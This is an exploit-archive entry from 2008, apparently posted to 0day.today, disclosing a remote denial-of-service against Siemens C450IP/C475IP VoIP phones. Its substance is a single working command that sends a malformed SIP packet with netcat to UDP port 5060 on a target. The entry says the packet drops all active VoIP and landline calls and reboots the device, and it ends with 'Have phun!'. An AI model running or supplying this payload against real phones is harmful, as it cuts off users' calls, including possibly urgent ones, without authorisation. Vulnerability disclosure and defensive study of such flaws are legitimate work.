id: 6671
date: 11/24/2008
title: Siemens C450IP/C475IP Remote Denial of Service Vulnerability
author: sky & Any
cves: 

============================================================
Siemens C450IP/C475IP Remote Denial of Service Vulnerability
============================================================


Hi,

echo -e "X sip:s X\nFrom:<sip:@x>\nTo:<sip:@x>\n" | nc -q0 -u <target> 5060

Will disconnect all current VOIP and PSTN calls and reboot
the C450IP/C475IP devices.

Tested with current firmwares.

Vendor (Siemens) was contacted 11/2007, no fix supplied yet.

Have phun!

sky & Any



#  0day.today [2023-03-25]  #